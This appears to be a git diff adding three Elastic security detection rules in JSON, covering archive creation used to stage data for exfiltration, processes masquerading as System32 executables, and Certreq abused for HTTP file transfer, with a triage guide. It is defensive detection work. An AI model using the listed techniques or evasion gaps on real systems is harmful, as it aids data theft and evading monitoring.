100644 index 00000000000..35a804295ae --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_3.json @@ -0,0 +1,157 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Detects files being compressed or archived into common formats. This is a common technique used to obfuscate files to evade detection or to staging data for exfiltration.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 1000, + "name": "File Compressed or Archived into Common Format", + "query": "file where event.type in (\"creation\", \"change\") and process.executable != null and not user.id : \"S-1-5-18\" and\n file.Ext.header_bytes : (\n /* compression formats */\n \"1F9D*\", /* tar zip, tar.z (Lempel-Ziv-Welch algorithm) */\n \"1FA0*\", /* tar zip, tar.z (LZH algorithm) */\n \"425A68*\", /* Bzip2 */\n \"524E4301*\", /* Rob Northen Compression */\n \"524E4302*\", /* Rob Northen Compression */\n \"4C5A4950*\", /* LZIP */\n \"504B0*\", /* ZIP */\n \"526172211A07*\", /* RAR compressed */\n \"44434D0150413330*\", /* Windows Update Binary Delta Compression file */\n \"50413330*\", /* Windows Update Binary Delta Compression file */\n \"377ABCAF271C*\", /* 7-Zip */\n \"1F8B*\", /* GZIP */\n \"FD377A585A00*\", /* XZ, tar.xz */\n \"7801*\",\t /* zlib: No Compression (no preset dictionary) */\n \"785E*\",\t /* zlib: Best speed (no preset dictionary) */\n \"789C*\",\t /* zlib: Default Compression (no preset dictionary) */\n \"78DA*\", \t /* zlib: Best Compression (no preset dictionary) */\n \"7820*\",\t /* zlib: No Compression (with preset dictionary) */\n \"787D*\",\t /* zlib: Best speed (with preset dictionary) */\n \"78BB*\",\t /* zlib: Default Compression (with preset dictionary) */\n \"78F9*\",\t /* zlib: Best Compression (with preset dictionary) */\n \"62767832*\", /* LZFSE */\n \"28B52FFD*\", /* Zstandard, zst */\n \"5253564B44415441*\", /* QuickZip rs compressed archive */\n \"2A2A4143452A2A*\", /* ACE */\n\n /* archive formats */\n \"2D686C302D*\", /* lzh */\n \"2D686C352D*\", /* lzh */\n \"303730373037*\", /* cpio */\n \"78617221*\", /* xar */\n \"4F4152*\", /* oar */\n \"49536328*\" /* cab archive */\n ) and\n not (\n (\n process.name : \"firefox.exe\" and\n process.code_signature.subject_name : \"Mozilla Corporation\" and process.code_signature.trusted == true\n ) or\n (\n process.name : \"wazuh-agent.exe\" and\n process.code_signature.subject_name : \"Wazuh, Inc\" and process.code_signature.trusted == true and\n file.name : (\"ossec-*.log.gz\", \"tmp-entry.gz\", \"tmp-entry\", \"last-entry.gz\")\n ) or\n (\n process.name : \"excel.exe\" and\n process.code_signature.subject_name : \"Microsoft Corporation\" and process.code_signature.trusted == true and\n file.extension : (\"tmp\", \"xlsx\", \"gz\", \"xlsb\", \"xar\", \"xslm\")\n ) or\n (\n process.name : \"Dropbox.exe\" and\n process.code_signature.subject_name : \"Dropbox, Inc\" and process.code_signature.trusted == true and\n file.name : \"store.bin\"\n ) or\n (\n process.name : \"DellSupportAssistRemedationService.exe\" and\n process.code_signature.subject_name : \"Dell Inc\" and process.code_signature.trusted == true and\n file.extension : \"manifest\"\n )\n )\n", + "references": [ + "https://en.wikipedia.org/wiki/List_of_file_signatures" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "79124edf-30a8-4d48-95c4-11522cad94b1", + "severity": "low", + "tags": [ + "Data Source: Elastic Defend", + "Domain: Endpoint", + "OS: macOS", + "OS: Windows", + "Tactic: Collection", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1560", + "name": "Archive Collected Data", + "reference": "https://attack.mitre.org/techniques/T1560/", + "subtechnique": [ + { + "id": "T1560.001", + "name": "Archive via Utility", + "reference": "https://attack.mitre.org/techniques/T1560/001/" + } + ] + }, + { + "id": "T1074", + "name": "Data Staged", + "reference": "https://attack.mitre.org/techniques/T1074/", + "subtechnique": [ + { + "id": "T1074.001", + "name": "Local Data Staging", + "reference": "https://attack.mitre.org/techniques/T1074/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1132", + "name": "Data Encoding", + "reference": "https://attack.mitre.org/techniques/T1132/", + "subtechnique": [ + { + "id": "T1132.001", + "name": "Standard Encoding", + "reference": "https://attack.mitre.org/techniques/T1132/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "79124edf-30a8-4d48-95c4-11522cad94b1_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_3.json b/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_3.json new file mode 100644 index 00000000000..60605afd5c9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_3.json @@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies suspicious instances of default system32 executables, either unsigned or signed with non-MS certificates. This could indicate the attempt to masquerade as system executables or backdoored and resigned legitimate executables.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Masquerading as System32 Executable", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and \n (process.code_signature.status : \"?*\" or process.code_signature.exists != null) and\n process.name: (\n \"agentactivationruntimestarter.exe\", \"agentservice.exe\", \"aitstatic.exe\", \"alg.exe\", \"apphostregistrationverifier.exe\", \"appidcertstorecheck.exe\", \"appidpolicyconverter.exe\", \"appidtel.exe\", \"applicationframehost.exe\", \"applysettingstemplatecatalog.exe\", \"applytrustoffline.exe\", \"approvechildrequest.exe\", \"appvclient.exe\", \"appvdllsurrogate.exe\", \"appvnice.exe\", \"appvshnotify.exe\", \"arp.exe\", \"assignedaccessguard.exe\", \"at.exe\", \"atbroker.exe\", \"attrib.exe\", \"audiodg.exe\", \"auditpol.exe\", \"authhost.exe\", \"autochk.exe\", \"autoconv.exe\", \"autofmt.exe\", \"axinstui.exe\", \"baaupdate.exe\", \"backgroundtaskhost.exe\", \"backgroundtransferhost.exe\", \"bcdboot.exe\", \"bcdedit.exe\", \"bdechangepin.exe\", \"bdehdcfg.exe\", \"bdeuisrv.exe\", \"bdeunlock.exe\", \"bioiso.exe\", \"bitlockerdeviceencryption.exe\", \"bitlockerwizard.exe\", \"bitlockerwizardelev.exe\", \"bitsadmin.exe\", \"bootcfg.exe\", \"bootim.exe\", \"bootsect.exe\", \"bridgeunattend.exe\", \"browserexport.exe\", \"browser_broker.exe\", \"bthudtask.exe\", \"bytecodegenerator.exe\", \"cacls.exe\", \"calc.exe\", \"camerasettingsuihost.exe\", \"castsrv.exe\", \"certenrollctrl.exe\", \"certreq.exe\", \"certutil.exe\", \"change.exe\", \"changepk.exe\", \"charmap.exe\", \"checknetisolation.exe\", \"chglogon.exe\", \"chgport.exe\", \"chgusr.exe\", \"chkdsk.exe\", \"chkntfs.exe\", \"choice.exe\", \"cidiag.exe\", \"cipher.exe\", \"cleanmgr.exe\", \"cliconfg.exe\", \"clip.exe\", \"clipup.exe\", \"cloudexperiencehostbroker.exe\", \"cloudnotifications.exe\", \"cmd.exe\", \"cmdkey.exe\", \"cmdl32.exe\", \"cmmon32.exe\", \"cmstp.exe\", \"cofire.exe\", \"colorcpl.exe\", \"comp.exe\", \"compact.exe\", \"compattelrunner.exe\", \"compmgmtlauncher.exe\", \"comppkgsrv.exe\", \"computerdefaults.exe\", \"conhost.exe\", \"consent.exe\", \"control.exe\", \"convert.exe\", \"convertvhd.exe\", \"coredpussvr.exe\", \"credentialenrollmentmanager.exe\", \"credentialuibroker.exe\", \"credwiz.exe\", \"cscript.exe\", \"csrss.exe\", \"ctfmon.exe\", \"cttune.exe\", \"cttunesvr.exe\", \"custominstallexec.exe\", \"customshellhost.exe\", \"dashost.exe\", \"dataexchangehost.exe\", \"datastorecachedumptool.exe\", \"dccw.exe\", \"dcomcnfg.exe\", \"ddodiag.exe\", \"defrag.exe\", \"deploymentcsphelper.exe\", \"desktopimgdownldr.exe\", \"devicecensus.exe\", \"devicecredentialdeployment.exe\", \"deviceeject.exe\", \"deviceenroller.exe\", \"devicepairingwizard.exe\", \"deviceproperties.exe\", \"dfdwiz.exe\", \"dfrgui.exe\", \"dialer.exe\", \"directxdatabaseupdater.exe\", \"diskpart.exe\", \"diskperf.exe\", \"diskraid.exe\", \"disksnapshot.exe\", \"dism.exe\", \"dispdiag.exe\", \"displayswitch.exe\", \"djoin.exe\", \"dllhost.exe\", \"dllhst3g.exe\", \"dmcertinst.exe\", \"dmcfghost.exe\", \"dmclient.exe\", \"dmnotificationbroker.exe\", \"dmomacpmo.exe\", \"dnscacheugc.exe\", \"doskey.exe\", \"dpapimig.exe\", \"dpiscaling.exe\", \"dpnsvr.exe\", \"driverquery.exe\", \"drvinst.exe\", \"dsmusertask.exe\", \"dsregcmd.exe\", \"dstokenclean.exe\", \"dusmtask.exe\", \"dvdplay.exe\", \"dwm.exe\", \"dwwin.exe\", \"dxdiag.exe\", \"dxgiadaptercache.exe\", \"dxpserver.exe\", \"eap3host.exe\", \"easeofaccessdialog.exe\", \"easinvoker.exe\", \"easpolicymanagerbrokerhost.exe\", \"edpcleanup.exe\", \"edpnotify.exe\", \"eduprintprov.exe\", \"efsui.exe\", \"ehstorauthn.exe\", \"eoaexperiences.exe\", \"esentutl.exe\", \"eudcedit.exe\", \"eventcreate.exe\", \"eventvwr.exe\", \"expand.exe\", \"extrac32.exe\", \"fc.exe\", \"fclip.exe\", \"fhmanagew.exe\", \"filehistory.exe\", \"find.exe\", \"findstr.exe\", \"finger.exe\", \"fixmapi.exe\", \"fltmc.exe\", \"fodhelper.exe\", \"fondue.exe\", \"fontdrvhost.exe\", \"fontview.exe\", \"forfiles.exe\", \"fsavailux.exe\", \"fsiso.exe\", \"fsquirt.exe\", \"fsutil.exe\", \"ftp.exe\", \"fvenotify.exe\", \"fveprompt.exe\", \"gamebarpresencewriter.exe\", \"gamepanel.exe\", \"genvalobj.exe\", \"getmac.exe\", \"gpresult.exe\", \"gpscript.exe\", \"gpupdate.exe\", \"grpconv.exe\", \"hdwwiz.exe\", \"help.exe\", \"hostname.exe\", \"hvax64.exe\", \"hvix64.exe\", \"hvsievaluator.exe\", \"icacls.exe\", \"icsentitlementhost.exe\", \"icsunattend.exe\", \"ie4uinit.exe\", \"ie4ushowie.exe\", \"iesettingsync.exe\", \"ieunatt.exe\", \"iexpress.exe\", \"immersivetpmvscmgrsvr.exe\", \"infdefaultinstall.exe\", \"inputswitchtoasthandler.exe\", \"iotstartup.exe\", \"ipconfig.exe\", \"iscsicli.exe\", \"iscsicpl.exe\", \"isoburn.exe\", \"klist.exe\", \"ksetup.exe\", \"ktmutil.exe\", \"label.exe\", \"languagecomponentsinstallercomhandler.exe\", \"launchtm.exe\", \"launchwinapp.exe\", \"legacynetuxhost.exe\", \"licensemanagershellext.exe\", \"licensingdiag.exe\", \"licensingui.exe\", \"locationnotificationwindows.exe\", \"locator.exe\", \"lockapphost.exe\", \"lockscreencontentserver.exe\", \"lodctr.exe\", \"logagent.exe\", \"logman.exe\", \"logoff.exe\", \"logonui.exe\", \"lpkinstall.exe\", \"lpksetup.exe\", \"lpremove.exe\", \"lsaiso.exe\", \"lsass.exe\", \"magnify.exe\", \"makecab.exe\", \"manage-bde.exe\", \"mavinject.exe\", \"mbaeparsertask.exe\", \"mblctr.exe\", \"mbr2gpt.exe\", \"mcbuilder.exe\", \"mdeserver.exe\", \"mdmagent.exe\", \"mdmappinstaller.exe\", \"mdmdiagnosticstool.exe\", \"mdres.exe\", \"mdsched.exe\", \"mfpmp.exe\", \"microsoft.uev.cscunpintool.exe\", \"microsoft.uev.synccontroller.exe\", \"microsoftedgebchost.exe\", \"microsoftedgecp.exe\", \"microsoftedgedevtools.exe\", \"microsoftedgesh.exe\", \"mmc.exe\", \"mmgaserver.exe\", \"mobsync.exe\", \"mountvol.exe\", \"mousocoreworker.exe\", \"mpnotify.exe\", \"mpsigstub.exe\", \"mrinfo.exe\", \"mschedexe.exe\", \"msconfig.exe\", \"msdt.exe\", \"msdtc.exe\", \"msfeedssync.exe\", \"msg.exe\", \"mshta.exe\", \"msiexec.exe\", \"msinfo32.exe\", \"mspaint.exe\", \"msra.exe\", \"msspellcheckinghost.exe\", \"mstsc.exe\", \"mtstocom.exe\", \"muiunattend.exe\", \"multidigimon.exe\", \"musnotification.exe\", \"musnotificationux.exe\", \"musnotifyicon.exe\", \"narrator.exe\", \"nbtstat.exe\", \"ndadmin.exe\", \"ndkping.exe\", \"net.exe\", \"net1.exe\", \"netbtugc.exe\", \"netcfg.exe\", \"netcfgnotifyobjecthost.exe\", \"netevtfwdr.exe\", \"nethost.exe\", \"netiougc.exe\", \"netplwiz.exe\", \"netsh.exe\", \"netstat.exe\", \"newdev.exe\", \"ngciso.exe\", \"nltest.exe\", \"notepad.exe\", \"nslookup.exe\", \"ntoskrnl.exe\", \"ntprint.exe\", \"odbcad32.exe\", \"odbcconf.exe\", \"ofdeploy.exe\", \"omadmclient.exe\", \"omadmprc.exe\", \"openfiles.exe\", \"openwith.exe\", \"optionalfeatures.exe\", \"osk.exe\", \"pacjsworker.exe\", \"packagedcwalauncher.exe\", \"packageinspector.exe\", \"passwordonwakesettingflyout.exe\", \"pathping.exe\", \"pcalua.exe\", \"pcaui.exe\", \"pcwrun.exe\", \"perfmon.exe\", \"phoneactivate.exe\", \"pickerhost.exe\", \"pinenrollmentbroker.exe\", \"ping.exe\", \"pkgmgr.exe\", \"pktmon.exe\", \"plasrv.exe\", \"pnpunattend.exe\", \"pnputil.exe\", \"poqexec.exe\", \"pospaymentsworker.exe\", \"powercfg.exe\", \"presentationhost.exe\", \"presentationsettings.exe\", \"prevhost.exe\", \"printbrmui.exe\", \"printfilterpipelinesvc.exe\", \"printisolationhost.exe\", \"printui.exe\", \"proquota.exe\", \"provlaunch.exe\", \"provtool.exe\", \"proximityuxhost.exe\", \"prproc.exe\", \"psr.exe\", \"pwlauncher.exe\", \"qappsrv.exe\", \"qprocess.exe\", \"query.exe\", \"quser.exe\", \"qwinsta.exe\", \"rasautou.exe\", \"rasdial.exe\", \"raserver.exe\", \"rasphone.exe\", \"rdpclip.exe\", \"rdpinit.exe\", \"rdpinput.exe\", \"rdpsa.exe\", \"rdpsaproxy.exe\", \"rdpsauachelper.exe\", \"rdpshell.exe\", \"rdpsign.exe\", \"rdrleakdiag.exe\", \"reagentc.exe\", \"recdisc.exe\", \"recover.exe\", \"recoverydrive.exe\", \"refsutil.exe\", \"reg.exe\", \"regedt32.exe\", \"regini.exe\", \"register-cimprovider.exe\", \"regsvr32.exe\", \"rekeywiz.exe\", \"relog.exe\", \"relpost.exe\", \"remoteapplifetimemanager.exe\", \"remoteposworker.exe\", \"repair-bde.exe\", \"replace.exe\", \"reset.exe\", \"resetengine.exe\", \"resmon.exe\", \"rmactivate.exe\", \"rmactivate_isv.exe\", \"rmactivate_ssp.exe\", \"rmactivate_ssp_isv.exe\", \"rmclient.exe\", \"rmttpmvscmgrsvr.exe\", \"robocopy.exe\", \"route.exe\", \"rpcping.exe\", \"rrinstaller.exe\", \"rstrui.exe\", \"runas.exe\", \"rundll32.exe\", \"runexehelper.exe\", \"runlegacycplelevated.exe\", \"runonce.exe\", \"runtimebroker.exe\", \"rwinsta.exe\", \"sc.exe\", \"schtasks.exe\", \"scriptrunner.exe\", \"sdbinst.exe\", \"sdchange.exe\", \"sdclt.exe\", \"sdiagnhost.exe\", \"searchfilterhost.exe\", \"searchindexer.exe\", \"searchprotocolhost.exe\", \"secedit.exe\", \"secinit.exe\", \"securekernel.exe\", \"securityhealthhost.exe\", \"securityhealthservice.exe\", \"securityhealthsystray.exe\", \"sensordataservice.exe\", \"services.exe\", \"sessionmsg.exe\", \"sethc.exe\", \"setspn.exe\", \"settingsynchost.exe\", \"setupcl.exe\", \"setupugc.exe\", \"setx.exe\", \"sfc.exe\", \"sgrmbroker.exe\", \"sgrmlpac.exe\", \"shellappruntime.exe\", \"shrpubw.exe\", \"shutdown.exe\", \"sigverif.exe\", \"sihclient.exe\", \"sihost.exe\", \"slidetoshutdown.exe\", \"slui.exe\", \"smartscreen.exe\", \"smss.exe\", \"sndvol.exe\", \"snippingtool.exe\", \"snmptrap.exe\", \"sort.exe\", \"spaceagent.exe\", \"spaceman.exe\", \"spatialaudiolicensesrv.exe\", \"spectrum.exe\", \"spoolsv.exe\", \"sppextcomobj.exe\", \"sppsvc.exe\", \"srdelayed.exe\", \"srtasks.exe\", \"stordiag.exe\", \"subst.exe\", \"svchost.exe\", \"sxstrace.exe\", \"syncappvpublishingserver.exe\", \"synchost.exe\", \"sysreseterr.exe\", \"systeminfo.exe\", \"systempropertiesadvanced.exe\", \"systempropertiescomputername.exe\", \"systempropertiesdataexecutionprevention.exe\", \"systempropertieshardware.exe\", \"systempropertiesperformance.exe\", \"systempropertiesprotection.exe\", \"systempropertiesremote.exe\", \"systemreset.exe\", \"systemsettingsadminflows.exe\", \"systemsettingsbroker.exe\", \"systemsettingsremovedevice.exe\", \"systemuwplauncher.exe\", \"systray.exe\", \"tabcal.exe\", \"takeown.exe\", \"tapiunattend.exe\", \"tar.exe\", \"taskhostw.exe\", \"taskkill.exe\", \"tasklist.exe\", \"taskmgr.exe\", \"tcblaunch.exe\", \"tcmsetup.exe\", \"tcpsvcs.exe\", \"thumbnailextractionhost.exe\", \"tieringengineservice.exe\", \"timeout.exe\", \"tokenbrokercookies.exe\", \"tpminit.exe\", \"tpmtool.exe\", \"tpmvscmgr.exe\", \"tpmvscmgrsvr.exe\", \"tracerpt.exe\", \"tracert.exe\", \"tscon.exe\", \"tsdiscon.exe\", \"tskill.exe\", \"tstheme.exe\", \"tswbprxy.exe\", \"ttdinject.exe\", \"tttracer.exe\", \"typeperf.exe\", \"tzsync.exe\", \"tzutil.exe\", \"ucsvc.exe\", \"uevagentpolicygenerator.exe\", \"uevappmonitor.exe\", \"uevtemplatebaselinegenerator.exe\", \"uevtemplateconfigitemgenerator.exe\", \"uimgrbroker.exe\", \"unlodctr.exe\", \"unregmp2.exe\", \"upfc.exe\", \"upgraderesultsui.exe\", \"upnpcont.exe\", \"upprinterinstaller.exe\", \"useraccountbroker.exe\", \"useraccountcontrolsettings.exe\", \"userinit.exe\", \"usoclient.exe\", \"utcdecoderhost.exe\", \"utilman.exe\", \"vaultcmd.exe\", \"vds.exe\", \"vdsldr.exe\", \"verclsid.exe\", \"verifier.exe\", \"verifiergui.exe\", \"vssadmin.exe\", \"vssvc.exe\", \"w32tm.exe\", \"waasmedicagent.exe\", \"waitfor.exe\", \"wallpaperhost.exe\", \"wbadmin.exe\", \"wbengine.exe\", \"wecutil.exe\", \"werfault.exe\", \"werfaultsecure.exe\", \"wermgr.exe\", \"wevtutil.exe\", \"wextract.exe\", \"where.exe\", \"whoami.exe\", \"wiaacmgr.exe\", \"wiawow64.exe\", \"wifitask.exe\", \"wimserv.exe\", \"winbiodatamodeloobe.exe\", \"windows.media.backgroundplayback.exe\", \"windows.warp.jitservice.exe\", \"windowsactiondialog.exe\", \"windowsupdateelevatedinstaller.exe\", \"wininit.exe\", \"winload.exe\", \"winlogon.exe\", \"winresume.exe\", \"winrs.exe\", \"winrshost.exe\", \"winrtnetmuahostserver.exe\", \"winsat.exe\", \"winver.exe\", \"wkspbroker.exe\", \"wksprt.exe\", \"wlanext.exe\", \"wlrmdr.exe\", \"wmpdmc.exe\", \"workfolders.exe\", \"wowreg32.exe\", \"wpcmon.exe\", \"wpctok.exe\", \"wpdshextautoplay.exe\", \"wpnpinst.exe\", \"wpr.exe\", \"write.exe\", \"wscadminui.exe\", \"wscollect.exe\", \"wscript.exe\", \"wsl.exe\", \"wsmanhttpconfig.exe\", \"wsmprovhost.exe\", \"wsqmcons.exe\", \"wsreset.exe\", \"wuapihost.exe\", \"wuauclt.exe\", \"wudfcompanionhost.exe\", \"wudfhost.exe\", \"wusa.exe\", \"wwahost.exe\", \"xblgamesavetask.exe\", \"xcopy.exe\", \"xwizard.exe\", \"aggregatorhost.exe\", \"diskusage.exe\", \"dtdump.exe\", \"ism.exe\", \"ndkperfcmd.exe\", \"ntkrla57.exe\", \"securekernella57.exe\", \"spaceutil.exe\", \"configure-smremoting.exe\", \"dcgpofix.exe\", \"dcpromo.exe\", \"dimc.exe\", \"diskshadow.exe\", \"drvcfg.exe\", \"escunattend.exe\", \"iashost.exe\", \"ktpass.exe\", \"lbfoadmin.exe\", \"netdom.exe\", \"rdspnf.exe\", \"rsopprov.exe\", \"sacsess.exe\", \"servermanager.exe\", \"servermanagerlauncher.exe\", \"setres.exe\", \"tsecimp.exe\", \"vssuirun.exe\", \"webcache.exe\", \"win32calc.exe\", \"certoc.exe\", \"sdndiagnosticstask.exe\", \"xpsrchvw.exe\"\n ) and\n not (\n process.code_signature.subject_name in (\n \"Microsoft Windows\",\n \"Microsoft Corporation\",\n \"Microsoft Windows Publisher\"\n ) and process.code_signature.trusted == true\n ) and not process.code_signature.status: (\"errorCode_endpoint*\", \"errorUntrustedRoot\", \"errorChaining\") and\n not\n (\n process.executable: (\n \"?:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\hostname.exe\",\n \"?:\\\\Windows\\\\Temp\\\\{*}\\\\taskkill.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\{*}\\\\taskkill.exe\",\n \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\System32\\\\ie4ushowIE.exe\",\n \"?:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\find.exe\"\n )\n ) and\n not\n (\n (process.name: \"ucsvc.exe\" and process.code_signature.subject_name == \"Wellbia.com Co., Ltd.\" and process.code_signature.status: \"trusted\") or\n (process.name: \"pnputil.exe\" and process.code_signature.subject_name: \"Lenovo\" and process.code_signature.status: \"trusted\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "79ce2c96-72f7-44f9-88ef-60fa1ac2ce47", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "Data Source: Elastic Defend", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + }, + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1554", + "name": "Compromise Client Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_8.json b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_8.json new file mode 100644 index 00000000000..31884caea68 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_8.json @@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies Certreq making an HTTP Post request. Adversaries could abuse Certreq to download files or upload data to a remote URL.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential File Transfer via Certreq", + "note": "## Triage and analysis\n\n### Investigating Potential File Transfer via Certreq\n\nCertreq is a command-line utility in Windows operating systems that allows users to request and manage certificates from certificate authorities. It is primarily used for generating certificate signing requests (CSRs) and installing certificates. However, adversaries may abuse Certreq's functionality to download files or upload data to a remote URL by making an HTTP POST request.\n\nThis rule identifies the potential abuse of Certreq to download files or upload data to a remote URL.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the details of the dropped file, and whether it was executed.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond 